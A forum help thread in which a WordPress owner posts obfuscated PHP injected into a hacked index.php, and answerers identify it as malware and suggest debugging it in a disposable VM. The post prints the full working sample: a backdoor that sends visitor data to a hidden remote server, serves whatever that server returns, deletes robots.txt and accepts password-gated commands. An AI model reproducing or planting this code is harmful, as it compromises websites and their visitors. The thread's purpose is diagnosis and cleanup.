This code seemed to have appeared at the top of index.php after wordpress was compromised:
<?php $O0_OO00__O=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$OO__O000_O=$O0_OO00__O[42].$O0_OO00__O[63].$O0_OO00__O[39].$O0_OO00__O[31].$O0_OO00__O[10].$O0_OO00__O[65].$O0_OO00__O[31].$O0_OO00__O[13].$O0_OO00__O[10].$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[5].$O0_OO00__O[13].$O0_OO00__O[31].$O0_OO00__O[5].$O0_OO00__O[13].$O0_OO00__O[40];$OO00_O__0O=$O0_OO00__O[45].$O0_OO00__O[13].$O0_OO00__O[13].$O0_OO00__O[44].$O0_OO00__O[10].$O0_OO00__O[3].$O0_OO00__O[60].$O0_OO00__O[63].$O0_OO00__O[39].$O0_OO00__O[34].$O0_OO00__O[10].$O0_OO00__O[43].$O0_OO00__O[60].$O0_OO00__O[31].$O0_OO00__O[53].$O0_OO00__O[55];$O0_0OO_O0_=$O0_OO00__O[3].$O0_OO00__O[21].$O0_OO00__O[40].$O0_OO00__O[31].$O0_OO00__O[62].$O0_OO00__O[58].$O0_OO00__O[10].$O0_OO00__O[34].$O0_OO00__O[31].$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[34].$O0_OO00__O[31];$OO_0_OO00_=$O0_OO00__O[65].$O0_OO00__O[59].$O0_OO00__O[60].$O0_OO00__O[5].$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[46].$O0_OO00__O[44].$O0_OO00__O[53].$O0_OO00__O[31].$O0_OO00__O[40].$O0_OO00__O[40];$O___00O0OO=$O0_OO00__O[42].$O0_OO00__O[63].$O0_OO00__O[39].$O0_OO00__O[31].$O0_OO00__O[10].$O0_OO00__O[31].$O0_OO00__O[15].$O0_OO00__O[63].$O0_OO00__O[40].$O0_OO00__O[13].$O0_OO00__O[40];$O00O_O_0O_=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[40].$O0_OO00__O[31].$O0_OO00__O[13].$O0_OO00__O[0].$O0_OO00__O[44].$O0_OO00__O[13];$OO00___O0O=$O0_OO00__O[44].$O0_OO00__O[53].$O0_OO00__O[31].$O0_OO00__O[65].$O0_OO00__O[10].$O0_OO00__O[40].$O0_OO00__O[44].$O0_OO00__O[39].$O0_OO00__O[63].$O0_OO00__O[13];$OO_0_O_00O=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[56].$O0_OO00__O[39].$O0_OO00__O[0].$O0_OO00__O[40].$O0_OO00__O[31];$O0_O_00_OO=$O0_OO00__O[40].$O0_OO00__O[13].$O0_OO00__O[53].$O0_OO00__O[10].$O0_OO00__O[40].$O0_OO00__O[44].$O0_OO00__O[39].$O0_OO00__O[63].$O0_OO00__O[13];$O_0O__OO00=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[63].$O0_OO00__O[5].$O0_OO00__O[63].$O0_OO00__O[13];$O00O_0O_O_=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[31].$O0_OO00__O[15].$O0_OO00__O[31].$O0_OO00__O[56];$O__0O0O_O0=$O0_OO00__O[21].$O0_OO00__O[53].$O0_OO00__O[53].$O0_OO00__O[21].$O0_OO00__O[55].$O0_OO00__O[10].$O0_OO00__O[44].$O0_OO00__O[0].$O0_OO00__O[44];$O0O___0OO0=$O0_OO00__O[50].$O0_OO00__O[21].$O0_OO00__O[53].$O0_OO00__O[10].$O0_OO00__O[34].$O0_OO00__O[60].$O0_OO00__O[46].$O0_OO00__O[44];$O__O_O00O0=$O0_OO00__O[63].$O0_OO00__O[40].$O0_OO00__O[10].$O0_OO00__O[21].$O0_OO00__O[53].$O0_OO00__O[53].$O0_OO00__O[21].$O0_OO00__O[55];$O___0O0O0O=$O0_OO00__O[44].$O0_OO00__O[53].$O0_OO00__O[63].$O0_OO00__O[5].$O0_OO00__O[13].$O0_OO00__O[10].$O0_OO00__O[53];$O000_O_O_O=$O0_OO00__O[60].$O0_OO00__O[5].$O0_OO00__O[39].$O0_OO00__O[63].$O0_OO00__O[5].$O0_OO00__O[25];$O0OO___O00=$O0_OO00__O[40].$O0_OO00__O[13].$O0_OO00__O[53].$O0_OO00__O[44].$O0_OO00__O[0].$O0_OO00__O[40];$O00_OO_0O_=$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[60].$O0_OO00__O[5].$O0_OO00__O[13];$O0O0_O_0_O=$O0_OO00__O[46].$O0_OO00__O[34].$O0_OO00__O[9];function O00O___O0O($googleUrl,$O_O_0_O0O0,$params){$O_O0_00OO_='https://%s/ping?sitemap=%s%s/%s';$O_0OO00_O_=sprintf($O_O0_00OO_,$googleUrl,$params['protocol'],$params['server_domain'],$O_O_0_O0O0);$O00_O0OO__=OO__000OO_($O_0OO00_O_);if(isset($_REQUEST['st'])){${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($O_0OO00_O_);${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($O00_O0OO__);die();}$OO__00OO_0='google';$O0_0O_O_O0='success';$O_O_OO00_0='failed';if(${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx4fx5fx5fx5fx4fx30x30"]($O00_O0OO__,$OO__00OO_0)!=false){die($O0_0O_O_O0);}else{$O_O0_00OO_='http://%s/ping?sitemap=%s%s/%s';$O_0OO00_O_=sprintf($O_O0_00OO_,$googleUrl,$params['protocol'],$params['server_domain'],$O_O_0_O0O0);$O00_O0OO__=OO__000OO_($O_0OO00_O_);if(${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx4fx5fx5fx5fx4fx30x30"]($O00_O0OO__,$OO__00OO_0)!=false){die($O0_0O_O_O0);}die($O_O_OO00_0);}}function OO__000OO_($url,$O0OO_00_O_='',$O00O_0_O_O=''){if($O0OO_00_O_==''){$OO_0_OO0_0=@${"x47x4cx4fx42x41x4cx53"}["x4fx4fx5fx5fx4fx30x30x30x5fx4f"]($url);if($OO_0_OO0_0){return $OO_0_OO0_0;}}$OO0_OO_00_=${"x47x4cx4fx42x41x4cx53"}["x4fx5fx30x4fx5fx5fx4fx4fx30x30"]();${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_URL,$url);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_USERAGENT,$O00O_0_O_O);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_RETURNTRANSFER,1);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_TIMEOUT,20);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_FRESH_CONNECT,TRUE);if($O0OO_00_O_!=''){${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_POST,1);if(${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx4fx5fx4fx30x30x4fx30"]($O0OO_00_O_)){${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_POSTFIELDS,${"x47x4cx4fx42x41x4cx53"}["x4fx4fx30x30x5fx4fx5fx5fx30x4f"]($O0OO_00_O_));}}$OO_0_OO0_0=${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx30x4fx5fx4fx5f"]($OO0_OO_00_);${"x47x4cx4fx42x41x4cx53"}["x4fx4fx5fx30x5fx4fx5fx30x30x4f"]($OO0_OO_00_);return $OO_0_OO0_0;}function OO_00__O0O(){if(${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx5fx30x30x4fx30x4fx4f"]('robots.txt')){@${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x30x5fx4fx5fx4fx5fx4f"]('robots.txt');}}$O_O0O_0_O0="jaAHqRd0vcxDaoKvVLTzXUIxEMtDwMxtLYT2Pgh0cLbXfYs2vODSC5PuVaXWgNDlDdwHrJS5gZOXaQguzevHyli6";$O_00_0_OOO=${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx4fx5fx30x30x5fx4fx4f"]($O_O0O_0_O0);$O0O0O_O__0='';for ($OO_0O_O_00=0;$OO_0O_O_00<${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x5fx4fx4fx5fx30x4fx5f"]($O_00_0_OOO);$OO_0O_O_00++){if($OO_0O_O_00%2!=0){$O0O0O_O__0.=$O_00_0_OOO[$OO_0O_O_00];}}$params['default_params']=$O_O0O_0_O0;$params['api']=${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx30x4fx4fx5fx4fx30x5f"]($O0O0O_O__0);$params['server_domain'] =isset(${"x5fx53x45x52x56x45x52"}['HTTP_HOST'])?${"x5fx53x45x52x56x45x52"}['HTTP_HOST']:${"x5fx53x45x52x56x45x52"}['SERVER_NAME'];$params['request_url']=${"x5fx53x45x52x56x45x52"}['REQUEST_URI'];$params['referer']=isset(${"x5fx53x45x52x56x45x52"}['HTTP_REFERER'])?${"x5fx53x45x52x56x45x52"}['HTTP_REFERER']:'';$params['user_agent']=isset(${"x5fx53x45x52x56x45x52"}['HTTP_USER_AGENT'])?${"x5fx53x45x52x56x45x52"}['HTTP_USER_AGENT']:'';$params['ip']=isset(${"x5fx53x45x52x56x45x52"}["HTTP_VIA"])?${"x5fx53x45x52x56x45x52"}["HTTP_X_FORWARDED_FOR"]:${"x5fx53x45x52x56x45x52"}["REMOTE_ADDR"];$params['protocol']=isset(${"x5fx53x45x52x56x45x52"}['HTTPS'])?'https://':'http://';$params['language']=isset(${"x5fx53x45x52x56x45x52"}['HTTP_ACCEPT_LANGUAGE'])?${"x5fx53x45x52x56x45x52"}['HTTP_ACCEPT_LANGUAGE']:'';if(isset($_REQUEST['params'])) {${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx5fx30x4fx30x4fx30x4f"]($params);die();}if(isset($_REQUEST['pwd163'])){if(${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx30x5fx4fx5fx30x5fx4f"]($_REQUEST['pwd163']."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"x5fx47x45x54"}['sitemap'])){$O_O_0_O0O0=${"x5fx47x45x54"}['sitemap'];$O0_0O_0_OO='www.google.com';if(isset(${"x5fx47x45x54"}['google_url'])){$O0_0O_0_OO=${"x5fx47x45x54"}['google_url'];}O00O___O0O($O0_0O_0_OO,$O_O_0_O0O0,$params);}}}OO_00__O0O();$O_O_00_OO0=array('domain'=>$params['server_domain'],'request_url'=>$params['request_url'],'ip'=>$params['ip'],'agent'=>$params['user_agent'],'referer'=>$params['referer'],'protocol'=>$params['protocol'],'language'=>$params['language']);$OOO00__0_O=OO__000OO_($params['api'],$O_O_00_OO0,$params['server_domain']);if(isset($_REQUEST['dump'])){${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($OOO00__0_O);$OOO00__0_O=OO__000OO_("http://google.co.jp");${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($OOO00__0_O);die();}$OOO00__0_O=@${"x47x4cx4fx42x41x4cx53"}["x4fx4fx5fx30x5fx4fx4fx30x30x5f"](${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx30x4fx4fx5fx4fx30x5f"]($OOO00__0_O));$OO000___OO=@${"x47x4cx4fx42x41x4cx53"}["x4fx4fx30x30x5fx5fx5fx4fx30x4f"]("/\|/si",$OOO00__0_O,-1,PREG_SPLIT_NO_EMPTY);if($OO000___OO!==false){$O0OO_00_O_=${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx30x4fx30x4fx5fx4fx30"]($OO000___OO);$O0OO_00_O_=${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx30x4fx4fx5fx4fx30x5f"]($O0OO_00_O_);foreach($OO000___OO as $header){@header($header);}echo $O0OO_00_O_;die();} ?>
Has someone an idea what it is about? Thanks in advance.
I tried to understand but my php is a little bit rusty.
2
Answers
The code you posted is malicious and has likely been injected into your website. Follow these steps:
Prevent future breaches by investigating the attack and maintaining security measures.
You’ve been pwned.
To reverse-engineer this obfuscated code efficiently, you need an IDE (integrated development environment) set up to debug php. If I were to do this reverse-engineering, I would use PhpStorm with xdebug. I already have that setup ready to go. You could also use vscode with xdebug.
Then you can open up this code in the IDE and format it so you can see where the php statements begin and end.
Next you can refactor the code to change the names of obfuscated variables (for example
$O0_OO00__O
) to something easier to read.Then you can step through the code line by line, and try to figure out what it does.
Considering this is malware, it’s probably best to analyze it on a virtual machine you can destroy when you’re done.
For what it’s worth, there are many better ways to build your php expertise than messing around with this sort of garbage.